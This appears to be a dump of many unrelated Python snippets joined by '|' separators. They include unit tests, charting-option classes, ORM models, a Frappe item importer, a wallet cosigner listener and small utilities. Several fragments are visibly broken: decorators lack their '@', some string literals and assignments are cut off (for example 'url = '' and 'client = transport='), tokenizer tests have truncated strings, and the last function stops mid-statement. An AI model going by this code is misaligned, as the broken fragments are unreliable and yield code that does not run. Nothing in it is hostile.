ret = daily_log_returns(df)
ret
assert all((abs((ret['1'].values - orig[0])) <= 1e-15))
assert all((abs((ret['2'].values - orig[1])) <= 1e-15)) |
def create_item(item_dict, item_details, item_group, center):
item = frappe.new_doc('Item')
item.zenoti_item_id = item_details['id']
item.zenoti_item_code = (item_details['code'] if ('code' in item_details) else item_dict['code'])
item.item_name = item_details['name']
item.item_group = item_group
item.is_stock_item = 0
item.include_item_in_manufacturing = 0
if (item_group.title() == 'Products'):
item.is_stock_item = 1
item.zenoti_item_type = get_zenoti_item_type(item_details)
item.stock_uom = 'Nos'
item.zenoti_center = center
if item_details.get('category_id'):
item.zenoti_item_category = get_zenoti_category(item_details.get('category_id'), center)
if item_details.get('sub_category_id'):
item.zenoti_item_sub_category = get_zenoti_category(item_details.get('sub_category_id'), center)
if item_details.get('image_paths'):
item.image = item_details['image_paths']
item.insert() |
class OptionSeriesScatterStatesSelect(Options):
def animation(self) -> 'OptionSeriesScatterStatesSelectAnimation':
return self._config_sub_data('animation', OptionSeriesScatterStatesSelectAnimation)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def halo(self) -> 'OptionSeriesScatterStatesSelectHalo':
return self._config_sub_data('halo', OptionSeriesScatterStatesSelectHalo)
def lineWidth(self):
return self._config_get(None)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def lineWidthPlus(self):
return self._config_get(1)
def lineWidthPlus(self, num: float):
self._config(num, js_type=False)
def marker(self) -> 'OptionSeriesScatterStatesSelectMarker':
return self._config_sub_data('marker', OptionSeriesScatterStatesSelectMarker) |
def generate_train_data(input_prefix=DEFAULT_CLUSTER_HEAD_PREFIX, output_prefix=DEFAULT_CLUSTER_PREFIX):
data = [('John Smith picked up the red ball and he threw it', {'spans': {f'{output_prefix}_1': [(0, 10, 'MENTION'), (38, 40, 'MENTION')], f'{output_prefix}_2': [(25, 33, 'MENTION'), (47, 49, 'MENTION')], f'{input_prefix}_1': [(5, 10, 'MENTION'), (38, 40, 'MENTION')], f'{input_prefix}_2': [(29, 33, 'MENTION'), (47, 49, 'MENTION')]}})]
return data |
.integration()
def test_read_dask_pyarrow(complex_dataset_fixture):
import dask
import dask.dataframe as dd
dask.config.set(scheduler='synchronous')
df = dd.read_parquet(f'foundry://{complex_dataset_fixture}/', storage_options={'branch': 'master'}, engine='pyarrow')
unique = df['string_column'].unique().compute()
print(unique)
print(df.shape) |
def test_ndgrid_2d_derivative(ndgrid_2d_data):
xy = ndgrid_2d_data.xy
z = ndgrid_2d_data.z
zi_d1_expected = ndgrid_2d_data.zi_d1
zi_d2_expected = ndgrid_2d_data.zi_d2
spline = csaps.NdGridCubicSmoothingSpline(xy, z, smooth=None).spline
spline_d1: csaps.NdGridSplinePPForm = spline.derivative(nu=(1, 1))
spline_d2: csaps.NdGridSplinePPForm = spline.derivative(nu=(2, 2))
zi_d1 = spline_d1(xy)
zi_d2 = spline_d2(xy)
assert (spline_d1.order == (3, 3))
assert (spline_d2.order == (2, 2))
assert (zi_d1 == pytest.approx(zi_d1_expected))
assert (zi_d2 == pytest.approx(zi_d2_expected)) |
def test_builder() -> None:
STEP_SIZE = 3
builder = IntegrityBuilder()
for i in range(0, len(TEST_STRING), STEP_SIZE):
builder.update(TEST_STRING[i:(i + STEP_SIZE)])
integrity = builder.build()
assert (integrity.algorithm == 'sha256')
assert (integrity.digest == TEST_SHA256) |
class InetAddressIPv6(TextualConvention, OctetString):
status = 'current'
displayHint = '2x:2x:2x:2x:2x:2x:2x:2x'
subtypeSpec = OctetString.subtypeSpec
subtypeSpec += ConstraintsUnion(ValueSizeConstraint(16, 16))
if mibBuilder.loadTexts:
description = 'Represents an IPv6 network address: Octets Contents Encoding 1-16 IPv6 address\nnetwork-byte order The corresponding InetAddressType value is ipv6(2). This\ntextual convention SHOULD NOT be used directly in object definitions, as it\nrestricts addresses to a specific format. However, if it is used, it MAY be\nused either on its own or in conjunction with InetAddressType, as a pair.\n' |
def Options(optionsList=None, mutable=False):
import ast, sys
global contextOptionsString
contextOptionsDict = {}
help = 'Context input options:\n'
for optTuple in optionsList:
help += '{0}[{1}] {2}\n\n'.format(optTuple[0], optTuple[1], optTuple[2])
contextOptionsDict[optTuple[0]] = optTuple[1]
logEvent(help)
if (contextOptionsString == '?'):
print(help)
contextOptionsString = None
sys.exit(0)
if (contextOptionsString is not None):
option_overides = contextOptionsString.split(' ')
for option in option_overides:
(lvalue, rvalue) = option.split('=')
if (lvalue in contextOptionsDict):
logEvent('Processing context input options from commandline')
try:
contextOptionsDict[lvalue] = ast.literal_eval(rvalue)
logEvent(((lvalue + ' = ') + rvalue))
except:
sys.stderr.write('Failed setting context options from command line string.')
raise
else:
logEvent((('IGNORING CONTEXT OPTION; DECLARE ' + lvalue) + ' IF YOU WANT TO SET IT'))
if mutable:
ContextOptions = dataclasses.make_dataclass('ContextOptions', [(k, type(contextOptionsDict[k]), dataclasses.field(default_factory=(lambda x=contextOptionsDict[k]: x))) for k in contextOptionsDict.keys()])
return ContextOptions(**contextOptionsDict)
else:
ContextOptions = namedtuple('ContextOptions', list(contextOptionsDict.keys()))
return ContextOptions._make(list(contextOptionsDict.values())) |
def make_component_logger(configuration: ComponentConfiguration, agent_name: str) -> Optional[logging.Logger]:
if (configuration.component_type == ComponentType.SKILL):
return None
logger_name = f'aea.packages.{configuration.author}.{configuration.component_type.to_plural()}.{configuration.name}'
_logger = AgentLoggerAdapter(get_logger(logger_name, agent_name), agent_name)
return cast(logging.Logger, _logger) |
class FlicketAction(PaginatedAPIMixin, Base):
__tablename__ = 'flicket_ticket_action'
id = db.Column(db.Integer, primary_key=True)
ticket_id = db.Column(db.Integer, db.ForeignKey(FlicketTicket.id))
ticket = db.relationship(FlicketTicket)
post_id = db.Column(db.Integer, db.ForeignKey(FlicketPost.id))
post = db.relationship(FlicketPost)
action = db.Column(db.String(field_size['action_max_length']))
data = db.Column(db.JSON(none_as_null=True))
user_id = db.Column(db.Integer, db.ForeignKey(FlicketUser.id))
user = db.relationship(FlicketUser, foreign_keys=[user_id])
recipient_id = db.Column(db.Integer, db.ForeignKey(FlicketUser.id))
recipient = db.relationship(FlicketUser, foreign_keys=[recipient_id])
date = db.Column(db.DateTime)
def output_action(self):
_date = self.date.strftime('%d-%m-%Y %H:%M')
if (self.action == 'open'):
return f'Ticket opened by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}'
if (self.action == 'assign'):
return f'Ticket assigned to <a href="mailto:{self.recipient.email}">{self.recipient.name}</a> by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}'
if (self.action == 'claim'):
return f'Ticked claimed by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}'
if (self.action == 'status'):
return f"""Ticket status has been changed to "{self.data['status']}" by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}"""
if (self.action == 'priority'):
return f"""Ticket priority has been changed to "{self.data['priority']}" by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}"""
if (self.action == 'release'):
return f'Ticket released by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}'
if (self.action == 'close'):
return f'Ticked closed by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}'
if (self.action == 'department_category'):
return f"""Ticket category has been changed to "{self.data['department_category']}" by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}"""
if (self.action == 'subscribe'):
return f'<a href="mailto:{self.recipient.email}">{self.recipient.name}</a> has been subscribed to ticket by <a href="mailto:{self.user.email}">{self.user.name}</a>. | {_date}'
if (self.action == 'unsubscribe'):
return f'<a href="mailto:{self.recipient.email}">{self.recipient.name}</a> has been un-subscribed from ticket by <a href="mailto:{self.user.email}">{self.user.name}</a>. | {_date}'
def to_dict(self):
data = {'id': self.id, 'ticket_id': self.ticket_id, 'post_id': self.post_id, 'action': self.action, 'data': self.data, 'user_id': self.user_id, 'recipient_id': self.recipient_id, 'date': self.date, 'links': {'self': (app.config['base_url'] + url_for('bp_api.get_action', id=self.id)), 'actions': (app.config['base_url'] + url_for('bp_api.get_actions', ticket_id=self.ticket_id))}}
return data
def __repr__(self):
return f'<Class FlicketAction: ticket_id={self.ticket_id}, post_id={self.ticket_id}, action={self.action!r}, data={self.data}, user_id={self.user_id}, recipient_id={self.recipient_id}, date={self.date}>' |
def test_set_cookie_with_cookiejar() -> None:
url = '
cookies = CookieJar()
cookie = Cookie(version=0, name='example-name', value='example-value', port=None, port_specified=False, domain='', domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={'HttpOnly': ''}, rfc2109=False)
cookies.set_cookie(cookie)
client = transport=
response = client.get(url)
assert (response.status_code == 200)
assert (response.json() == {'cookies': 'example-name=example-value'}) |
class ScopeHunterSupportInfoCommand(sublime_plugin.ApplicationCommand):
def run(self):
info = {}
info['platform'] = sublime.platform()
info['version'] = sublime.version()
info['arch'] = sublime.arch()
info['plugin_version'] = __version__
info['pc_install'] = is_installed_by_package_control()
try:
import mdpopups
info['mdpopups_version'] = format_version(mdpopups, 'version', call=True)
except Exception:
info['mdpopups_version'] = 'Version could not be acquired!'
msg = textwrap.dedent(' - ST ver.: {version}\n - Platform: {platform}\n - Arch: {arch}\n - Plugin ver.: {plugin_version}\n - Install via PC: {pc_install}\n - mdpopups ver.: {mdpopups_version}\n '.format(**info))
sublime.message_dialog((msg + '\nInfo has been copied to the clipboard.'))
sublime.set_clipboard(msg) |
class TaskOneToOne(sl.Task):
def __init__(self, *args, **kwargs):
super(sl.Task, self).__init__(*args, **kwargs)
self.in_first = None
def actual_task_code(self, task_df_first):
return task_df_first
def out_first(self):
return sl.TargetInfo(self, ((_paths_folder + self.task_id) + '_output_path_1.txt'))
def run(self):
time.sleep(_sleep_duration)
task_df_first = read_result(self.in_first().open().read())
result_first = self.actual_task_code(task_df_first)
task_md = generate_task_meta_data(self)
task_md.add_output_meta_data(generate_data_output_meta_data(1, result_first))
write_meta_data(((_metadata_folder + self.task_id) + '_task_meta_data.json'), task_md)
path1 = write_result(((_results_folder + self.task_id) + '_output_result_1.pkl'), result_first)
write_output_path(((_paths_folder + self.task_id) + '_output_path_1.txt'), path1) |
class OptionPlotoptionsTreemapLevelsDatalabelsTextpath(Options):
def attributes(self):
return self._config_get(None)
def attributes(self, value: Any):
self._config(value, js_type=False)
def enabled(self):
return self._config_get(False)
def enabled(self, flag: bool):
self._config(flag, js_type=False) |
class _X():
def __init__(self, path=None):
self.path = (path or [])
def __getattr__(self, attr):
x = (getattr, attr)
return type(self)((self.path + [x]))
def __getitem__(self, item):
x = (getitem, item)
return type(self)((self.path + [x]))
def __call__(self, obj):
for (f, p) in self.path:
obj = f(obj, p)
return obj |
.parametrize('typ', ['inject', 'prolong'])
def test_transfer_scalar_vector(typ):
mesh = UnitSquareMesh(1, 1)
mh = MeshHierarchy(mesh, 1)
(coarse, fine) = mh
for (space, val) in [(FunctionSpace, 1), (VectorFunctionSpace, [2, 1])]:
Vc = space(coarse, 'CG', 1)
Vf = space(fine, 'CG', 1)
if (typ == 'inject'):
Vdonor = Function(Vf)
Vtarget = Function(Vc)
transfer = inject
else:
Vdonor = Function(Vc)
Vtarget = Function(Vf)
transfer = prolong
donor = Function(Vdonor)
target = Function(Vtarget)
donor.assign(Constant(val))
transfer(donor, target)
assert numpy.allclose(target.dat.data_ro, val) |
class OptionPlotoptionsNetworkgraphSonificationContexttracksMappingFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def ziggurat_model_init(user=None, group=None, user_group=None, group_permission=None, user_permission=None, user_resource_permission=None, group_resource_permission=None, resource=None, external_identity=None, *args, **kwargs):
models = ModelProxy()
models.User = user
models.Group = group
models.UserGroup = user_group
models.GroupPermission = group_permission
models.UserPermission = user_permission
models.UserResourcePermission = user_resource_permission
models.GroupResourcePermission = group_resource_permission
models.Resource = resource
models.ExternalIdentity = external_identity
model_service_mapping = import_model_service_mappings()
if kwargs.get('passwordmanager'):
user.passwordmanager = kwargs['passwordmanager']
else:
user.passwordmanager = make_passwordmanager(kwargs.get('passwordmanager_schemes'))
for (name, cls) in models.items():
services = model_service_mapping.get(name, [])
for service in services:
setattr(service, 'model', cls)
setattr(service, 'models_proxy', models) |
def extractQilintlCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class TestSymbolTokenizer(TestCase):
def setUp(self):
self.tokenizer = symbol_tokenizer
def test_split(self):
sentence = u' 1a. -- '
tokens = [u'1a', u'.', u'--', u' u'://', u'www', u'.', u'ex', '_', u'ample', u'.', u'com']
self.assertSequenceEqual(tokens, self.tokenizer(sentence))
def test_unicode(self):
sentence = u'ANj:%'
tokens = [u'ANj', u':%']
self.assertSequenceEqual(tokens, self.tokenizer(sentence))
def test_unicode_hyphens(self):
sentence = u'123-ABCDEFXYZ'
tokens = [u'123', u'-', u'ABC', u'', u'DEF', u'', u'XYZ']
self.assertSequenceEqual(tokens, self.tokenizer(sentence))
def test_slashes(self):
sentence = u'kg/meter'
tokens = [u'kg', u'/', u'meter']
self.assertSequenceEqual(tokens, self.tokenizer(sentence))
def test_superscript_numbers(self):
sentence = u'per m3 earth'
tokens = [u'per', u'm', u'3', u'earth']
self.assertSequenceEqual(tokens, self.tokenizer(sentence)) |
def test_guess_dict():
def t2(a: dict) -> str:
return ', '.join([f'K: {k} V: {v}' for (k, v) in a.items()])
task_spec = get_serializable(OrderedDict(), serialization_settings, t2)
assert (task_spec.template.interface.inputs['a'].type.simple == SimpleType.STRUCT)
pt = TypeEngine.guess_python_type(task_spec.template.interface.inputs['a'].type)
assert (pt is dict)
input_map = {'a': {'k1': 'v1', 'k2': '2'}}
guessed_types = {'a': pt}
ctx = context_manager.FlyteContext.current_context()
lm = TypeEngine.dict_to_literal_map(ctx, d=input_map, type_hints=guessed_types)
assert isinstance(lm.literals['a'].scalar.generic, Struct)
output_lm = t2.dispatch_execute(ctx, lm)
str_value = output_lm.literals['o0'].scalar.primitive.string_value
assert ((str_value == 'K: k2 V: 2, K: k1 V: v1') or (str_value == 'K: k1 V: v1, K: k2 V: 2')) |
def initialize_nodes(nodes: Union[('BaseNodeSpec', List['BaseNodeSpec'])], process_id: int, ns: str, message_broker: Any, is_initialized: Dict, sp_nodes: Dict, launch_nodes: Dict, rxnode_cls: Any=None, node_args: Dict=None):
if (rxnode_cls is None):
from eagerx.core.executable_node import RxNode
rxnode_cls = RxNode
if (not isinstance(nodes, list)):
nodes = [nodes]
from eagerx.core.specs import BaseNodeSpec
assert all([isinstance(n, BaseNodeSpec) for n in nodes])
bnd = message_broker.backend
for node in nodes:
name = node.config.name
is_initialized[name] = False
node_address = ((ns + '/') + name)
assert ((node_address not in sp_nodes) and (node_address not in launch_nodes)), ('Node "%s" already exists. Node names must be unique!' % name)
def initialized(msg, name):
is_initialized[name] = True
sub = message_broker.backend.Subscriber((node_address + '/initialized'), 'int64', partial(initialized, name=name))
message_broker.subscribers.append(sub)
if (node.config.process == process_id):
if (node_args is None):
node_args = dict()
sp_nodes[node_address] = rxnode_cls(name=node_address, message_broker=message_broker, **node_args)
sp_nodes[node_address].node_initialized()
elif ((node.config.process == process.NEW_PROCESS) and (process_id == process.ENVIRONMENT)):
assert ('executable' in node.config), ('No executable defined. Node "%s" can only be launched as a separate process if an executable is specified.' % name)
cmd = get_launch_cmd(node.config.executable, bnd, ns, name, external=False)
launch_nodes[node_address] = subprocess.Popen(cmd)
elif (node.config.process == process.EXTERNAL):
cmd = get_launch_cmd(node.config.executable, bnd, ns, name, external=True)
cmd_joined = ' '.join(cmd).replace('\n', '\\n')
message_broker.backend.loginfo(f'Launch node "{name}" externally with: python3 {cmd_joined}') |
def do_access(fa_fname, exclude_fnames=(), min_gap_size=5000, skip_noncanonical=True):
fa_regions = get_regions(fa_fname)
if skip_noncanonical:
fa_regions = drop_noncanonical_contigs(fa_regions)
access_regions = GA.from_rows(fa_regions)
for ex_fname in exclude_fnames:
excluded = tabio.read(ex_fname, 'bed3')
access_regions = access_regions.subtract(excluded)
return GA.from_rows(join_regions(access_regions, min_gap_size)) |
class IConfigRepository(ABC):
def get_schema_source(self) -> ConfigSource:
...
def load_config(self, config_path: str) -> Optional[ConfigResult]:
...
def group_exists(self, config_path: str) -> bool:
...
def config_exists(self, config_path: str) -> bool:
...
def get_group_options(self, group_name: str, results_filter: Optional[ObjectType]=ObjectType.CONFIG) -> List[str]:
...
def get_sources(self) -> List[ConfigSource]:
...
def initialize_sources(self, config_search_path: ConfigSearchPath) -> None:
... |
class TestANSIString(TestCase):
def setUp(self):
self.example_raw = '|relectric |cboogaloo|n'
self.example_ansi = ANSIString(self.example_raw)
self.example_str = 'electric boogaloo'
self.example_output = '\x1b[1m\x1b[31melectric \x1b[1m\x1b[36mboogaloo\x1b[0m'
def test_length(self):
self.assertEqual(len(self.example_ansi), 17)
def test_clean(self):
self.assertEqual(self.example_ansi.clean(), self.example_str)
def test_raw(self):
self.assertEqual(self.example_ansi.raw(), self.example_output)
def test_format(self):
self.assertEqual(f'{self.example_ansi:0<20}', (self.example_output + '000')) |
def safe_log_prob_sum(distrib, value: torch.Tensor) -> torch.Tensor:
try:
return distrib.log_prob(value).sum()
except (RuntimeError, ValueError) as e:
if (not distrib.support.check(value).all()):
return torch.tensor(float('-Inf')).to(value.device)
else:
raise e |
class SocialAuthJWTTests(mixins.SocialAuthMixin, mixins.SocialAuthJWTMixin, SchemaTestCase):
query = '\n mutation SocialAuth($provider: String!, $accessToken: String!) {\n socialAuth(provider: $provider, accessToken: $accessToken) {\n social {\n uid\n extraData\n }\n token\n }\n }'
class Mutations(graphene.ObjectType):
social_auth = graphql_social_auth.SocialAuthJWT.Field() |
class DownBlocks(fl.Chain):
def __init__(self, in_channels: int, device: ((Device | str) | None)=None, dtype: (DType | None)=None) -> None:
self.in_channels = in_channels
in_block = fl.Chain(fl.Conv2d(in_channels=in_channels, out_channels=320, kernel_size=3, padding=1, device=device, dtype=dtype))
first_blocks = [fl.Chain(ResidualBlock(in_channels=320, out_channels=320, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=320, out_channels=320, device=device, dtype=dtype)), fl.Chain(fl.Downsample(channels=320, scale_factor=2, padding=1, device=device, dtype=dtype))]
second_blocks = [fl.Chain(ResidualBlock(in_channels=320, out_channels=640, device=device, dtype=dtype), SDXLCrossAttention(channels=640, num_attention_layers=2, num_attention_heads=10, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=640, out_channels=640, device=device, dtype=dtype), SDXLCrossAttention(channels=640, num_attention_layers=2, num_attention_heads=10, device=device, dtype=dtype)), fl.Chain(fl.Downsample(channels=640, scale_factor=2, padding=1, device=device, dtype=dtype))]
third_blocks = [fl.Chain(ResidualBlock(in_channels=640, out_channels=1280, device=device, dtype=dtype), SDXLCrossAttention(channels=1280, num_attention_layers=10, num_attention_heads=20, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=1280, out_channels=1280, device=device, dtype=dtype), SDXLCrossAttention(channels=1280, num_attention_layers=10, num_attention_heads=20, device=device, dtype=dtype))]
super().__init__(in_block, *first_blocks, *second_blocks, *third_blocks) |
class OptionPlotoptionsGaugeTooltip(Options):
def clusterFormat(self):
return self._config_get('Clustered points: {point.clusterPointsAmount}')
def clusterFormat(self, text: str):
self._config(text, js_type=False)
def dateTimeLabelFormats(self) -> 'OptionPlotoptionsGaugeTooltipDatetimelabelformats':
return self._config_sub_data('dateTimeLabelFormats', OptionPlotoptionsGaugeTooltipDatetimelabelformats)
def distance(self):
return self._config_get(16)
def distance(self, num: float):
self._config(num, js_type=False)
def followPointer(self):
return self._config_get(False)
def followPointer(self, flag: bool):
self._config(flag, js_type=False)
def followTouchMove(self):
return self._config_get(True)
def followTouchMove(self, flag: bool):
self._config(flag, js_type=False)
def footerFormat(self):
return self._config_get('')
def footerFormat(self, text: str):
self._config(text, js_type=False)
def format(self):
return self._config_get('undefined')
def format(self, text: str):
self._config(text, js_type=False)
def headerFormat(self):
return self._config_get('')
def headerFormat(self, text: str):
self._config(text, js_type=False)
def nullFormat(self):
return self._config_get(None)
def nullFormat(self, text: str):
self._config(text, js_type=False)
def nullFormatter(self):
return self._config_get(None)
def nullFormatter(self, value: Any):
self._config(value, js_type=False)
def pointFormat(self):
return self._config_get(None)
def pointFormat(self, text: str):
self._config(text, js_type=False)
def pointFormatter(self):
return self._config_get(None)
def pointFormatter(self, value: Any):
self._config(value, js_type=False)
def valueDecimals(self):
return self._config_get(None)
def valueDecimals(self, num: float):
self._config(num, js_type=False)
def valuePrefix(self):
return self._config_get(None)
def valuePrefix(self, text: str):
self._config(text, js_type=False)
def valueSuffix(self):
return self._config_get(None)
def valueSuffix(self, text: str):
self._config(text, js_type=False)
def xDateFormat(self):
return self._config_get(None)
def xDateFormat(self, text: str):
self._config(text, js_type=False) |
class InterComBackEndAnalysisPlugInsPublisher(InterComRedisInterface):
def __init__(self, analysis_service=None):
super().__init__()
self.publish_available_analysis_plugins(analysis_service)
def publish_available_analysis_plugins(self, analysis_service):
available_plugin_dictionary = analysis_service.get_plugin_dict()
self.redis.set('analysis_plugins', available_plugin_dictionary) |
class ArticleCollectsView(View):
def post(self, request, nid):
res = {'msg': '!', 'code': 412, 'isCollects': True, 'data': 0}
if (not request.user.username):
res['msg'] = ''
return JsonResponse(res)
flag = request.user.collects.filter(nid=nid)
num = 1
res['code'] = 0
if flag:
res['msg'] = '!'
res['isCollects'] = False
request.user.collects.remove(nid)
num = (- 1)
else:
request.user.collects.add(nid)
article_query = Articles.objects.filter(nid=nid)
article_query.update(collects_count=(F('collects_count') + num))
collects_count = article_query.first().collects_count
res['data'] = collects_count
return JsonResponse(res) |
class Listener(util.DaemonThread):
def __init__(self, parent: 'CosignerPool'):
super().__init__('cosigner')
self.daemon = True
self.parent = parent
self.received: Set[str] = set()
def clear(self, keyhash_hex: str) -> None:
server.delete(keyhash_hex)
self.received.remove(keyhash_hex)
def run(self) -> None:
while self.running:
relevant_items = [item for item in self.parent._items if (not item.watching_only)]
if (not relevant_items):
time.sleep(2)
continue
for item in relevant_items:
if (item.keyhash_hex in self.received):
continue
try:
message = server.get(item.keyhash_hex)
except Exception as e:
logger.error('cannot contact cosigner pool')
time.sleep(30)
continue
if message:
self.received.add(item.keyhash_hex)
logger.debug('received message for %s', item.keyhash_hex)
app_state.app.cosigner_received_signal.emit(item, message)
time.sleep(30) |
def generate_env_vars_dicts_list(num_containers: int, repository_path: Optional[str]=None, server_certificate_provider: Optional[CertificateProvider]=None, server_certificate_path: Optional[str]=None, ca_certificate_provider: Optional[CertificateProvider]=None, ca_certificate_path: Optional[str]=None, server_ip_addresses: Optional[List[str]]=None, server_hostnames: Optional[List[str]]=None, server_private_key_ref_provider: Optional[PrivateKeyReferenceProvider]=None) -> List[Dict[(str, str)]]:
_validate_env_vars_length(num_containers=num_containers, server_ip_addresses=server_ip_addresses, server_hostnames=server_hostnames)
return [generate_env_vars_dict(repository_path=repository_path, server_certificate_provider=server_certificate_provider, server_certificate_path=server_certificate_path, ca_certificate_provider=ca_certificate_provider, ca_certificate_path=ca_certificate_path, server_ip_address=(server_ip_addresses[i] if server_ip_addresses else None), server_hostname=(server_hostnames[i] if server_hostnames else None), server_private_key_ref_provider=server_private_key_ref_provider) for i in range(num_containers)] |
class Progressbar():
def __init__(self, start_time, label, width=33):
self.start_time = start_time
self.label = label
self.width = width
self.prc = '='
self.pdc = ' '
self.head = '['
self.tail = ']'
self._lastlen = 0
def out(self, tot, scanned):
perc = int(((scanned * self.width) // (tot if (tot > 0) else 1)))
pad = (self.width - perc)
tm = (int((time.time() - self.start_time)) // 60)
bar = ('%s%s%s%s' % (self.head, (self.prc * perc), (self.pdc * pad), self.tail))
s = ('%s %d of %d %s in %d minutes' % (bar, scanned, tot, self.label, tm))
if self._lastlen:
sys.stdout.write(('\x08' * self._lastlen))
self._lastlen = len(s)
stdoutw(s) |
def mock_system_accounts_are_secured(self, cmd):
if ('UID_MIN' in cmd):
output = ['1000', '']
else:
output = ['root:x:0:0:root:/root:/bin/bash', 'sync:x:5:0:sync:/sbin:/bin/sync', 'shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown', 'halt:x:7:0:halt:/sbin:/sbin/halt', 'nobody:x:99:99:Nobody:/:/sbin/nologin', 'vagrant:x:1000:1000:vagrant:/home/vagrant:/bin/bash']
error = ['']
returncode = 0
return SimpleNamespace(stdout=output, stderr=error, returncode=returncode) |
class GCIso():
def __init__(self, name: str, root: str, system_code, game_code, region_code, publisher_code, compiler, sha1):
self.name = name
self.root = root
self.system_code = system_code
self.game_code = game_code
self.region_code = region_code
self.publisher_code = publisher_code
self.compiler = compiler
self.sha1 = sha1
def get_system_name(self):
return system_codes[self.system_code]
def get_publisher_name(self):
return publisher_codes[self.publisher_code]
def get_region_name(self):
return region_codes[self.region_code] |
def run_write_read(mesh, fs, degree, dumpfile):
V = FunctionSpace(mesh, fs, degree)
f = Function(V, name='f')
x = SpatialCoordinate(mesh)
f.interpolate((x[0] * x[1]))
g = Function(V, name='g')
g.interpolate((1 + (x[0] * x[1])))
f2 = Function(V, name='f')
g2 = Function(V, name='g')
dumpfile = mesh.comm.bcast(dumpfile, root=0)
with HDF5File(dumpfile, 'w', comm=mesh.comm) as h5:
h5.write(f, '/solution')
h5.read(f2, '/solution')
assert np.allclose(f.dat.data_ro, f2.dat.data_ro)
with HDF5File(dumpfile, 'w', comm=mesh.comm) as h5:
h5.write(f, '/solution', timestamp=math.pi)
h5.write(g, '/solution', timestamp=0.1)
h5.read(f2, '/solution', timestamp=math.pi)
h5.read(g2, '/solution', timestamp=0.1)
with g2.dat.vec as x, f2.dat.vec as y:
assert (x.max() > y.max())
assert np.allclose(f.dat.data_ro, f2.dat.data_ro) |
def dnd_bind(widget, sequence=None, func=None, add=None, need_cleanup=True):
what = ('bind', widget._w)
if isinstance(func, str):
widget.tk.call((what + (sequence, func)))
elif func:
func_id = widget._register(func, widget._substitute_dnd, need_cleanup)
cmd = ('%s%s %s' % (((add and '+') or ''), func_id, widget._subst_format_str_dnd))
widget.tk.call((what + (sequence, cmd)))
return func_id
elif sequence:
return widget.tk.call((what + (sequence,)))
else:
return widget.tk.splitlist(widget.tk.call(what)) |
class CliArgs():
def __init__(self, default_test='test', default_simtool='modelsim', default_gui=True, default_defines=[]):
self.args_parser = argparse.ArgumentParser()
self.args_parser.add_argument('-t', default=default_test, metavar='<name>', dest='test', help=("test <name>; default is '%s'" % default_test))
self.args_parser.add_argument('-s', default=default_simtool, metavar='<name>', dest='simtool', help=("simulation tool <name>; default is '%s'" % default_simtool))
self.args_parser.add_argument('-b', default=default_gui, dest='gui', action='store_false', help='enable batch mode (no GUI)')
self.args_parser.add_argument('-d', default=default_defines, metavar='<def>', dest='defines', nargs='+', help='define <name>; option can be used multiple times')
def parse(self):
return self.args_parser.parse_args() |
def q_a(m0, m1, m2, o0, o1, o2, n0, n1, n2):
x0 = (- o0)
x1 = (m0 + x0)
x2 = (- o1)
x3 = (m1 + x2)
x4 = (- o2)
x5 = (m2 + x4)
x6 = (n0 + x0)
x7 = (n1 + x2)
x8 = (n2 + x4)
return math.acos(((((x1 * x6) + (x3 * x7)) + (x5 * x8)) / (math.sqrt((((x1 ** 2) + (x3 ** 2)) + (x5 ** 2))) * math.sqrt((((x6 ** 2) + (x7 ** 2)) + (x8 ** 2)))))) |
class EosType():
size: int = None
fmt: str = None
def pack(cls, value: int) -> bytes:
return struct.pack(cls.fmt, value)
def unpack(cls, value: bytes) -> int:
return struct.unpack(cls.fmt, value[:cls.size])[0]
def pack_array(cls, items: list) -> bytes:
mbytes = b''
mbytes += VarUint32.pack(len(items))
for item in items:
mbytes += cls.pack(item)
return mbytes
def unpack_array(cls, packed_bytes: bytes) -> List:
(size, array_len) = VarUint32.unpack(packed_bytes)
packed_bytes = packed_bytes[size:]
values = []
for i in range(0, array_len):
value = cls.unpack(packed_bytes)
values.append(value)
packed_bytes = packed_bytes[cls.size:]
return values |
def populate_install_tree(inst_dir, path_map):
os.mkdir(inst_dir)
dest_dirs = {'': False}
def make_dest_dir(path):
if (path in dest_dirs):
return
parent = os.path.dirname(path)
make_dest_dir(parent)
abs_path = os.path.join(inst_dir, path)
os.mkdir(abs_path)
dest_dirs[path] = False
def install_file(info):
(dir_name, base_name) = os.path.split(info.dest)
make_dest_dir(dir_name)
if (base_name == '__init__.py'):
dest_dirs[dir_name] = True
abs_dest = os.path.join(inst_dir, info.dest)
shutil.copy2(info.src, abs_dest)
for info in path_map.values():
install_file(info)
for (dir_path, has_init) in dest_dirs.items():
if has_init:
continue
init_path = os.path.join(inst_dir, dir_path, '__init__.py')
with open(init_path, 'w'):
pass |
def generate_random_dict(depth=0, max_depth=3, max_keys=5, key_type=None):
if (not key_type):
key_type = random.choice(['str', 'int', 'float'])
if (depth > max_depth):
return {}
result = {}
for _ in range(random.randint(1, max_keys)):
if (key_type == 'str'):
